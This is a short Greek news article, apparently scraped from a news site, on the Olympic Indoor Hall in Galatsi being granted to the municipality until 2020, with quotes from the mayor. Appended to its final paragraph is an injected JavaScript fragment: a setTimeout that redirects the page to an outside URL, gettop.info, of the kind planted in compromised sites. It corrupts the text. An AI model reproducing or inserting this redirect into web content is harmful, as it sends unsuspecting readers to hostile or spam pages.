Στον δήμο Γαλατσίου παραχωρείται το ΠΑΛΑΙ έως το 2020

0
41

 

Στον δήμο Γαλατσίου παραχωρείται το Ολυμπιακό Κλειστό Γυμναστήριο για αθλητικούς και πολιτιστικούς σκοπούς έως τον Ιανουάριο του 2020, όπως αποφάσισε το ΔΣ της ΕΤΑΔ.

Ο δήμαρχος Γαλατσίου Γιώργος Μαρκόπουλος εξέφρασε την ικανοποίησή του και επεσήμανε: «Η συστηματική προσπάθεια μας απέδωσε καρπούς, εκπληρώνοντας τις προσδοκίες των συμπολιτών μας. Μέχρι πριν από λίγο καιρό το ΠΑΛΑΙ, ρήμαζε χωρίς προοπτικές. Τώρα μπορούμε επιτέλους να κάνουμε όχι μόνο μια επιτυχημένη καθημερινή διαχείριση, αλλά και έναν σοβαρό μεσομακροπρόθεσμο σχεδιασμό για την αξιοποίησή του. Να το χαρούν τα παιδιά μας, τα σωματεία μας, όλοι οι συμπολίτες μας.

Όπως προσέθεσε ο κ. Μαρκόπουλος «Για τα επόμενα -τουλάχιστον- 3½ χρόνια, καμία προπόνηση παιδιών και νέων δεν θα ξαναγίνει στη βροχή, στο κρύο ή στον καύσωνα. Επιτέλους η φωνή της τοπικής κοινωνίας ακούστηκε! Και θα υπάρχει και συνέχεια!».

Πριν από έναν χρόνο στο κλειστό μεταφέρονταν πρόσφυγες από την πλατεία Βικτωρίας προκειμένου να γίνει κέντρο φιλοξενίας στα πρότυπα του Ελαιώνα. Το στάδιο ανήκε στο ΤΑΙΠΕΔ και όχι στον δήμο. Εκτός από την κύρια αίθουσα, παραχωρούνται στον δήμο και οι περιβάλλοντες υπαίθριοι χώροι, καθώς και το νότιο βοηθητικό γήπεδο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here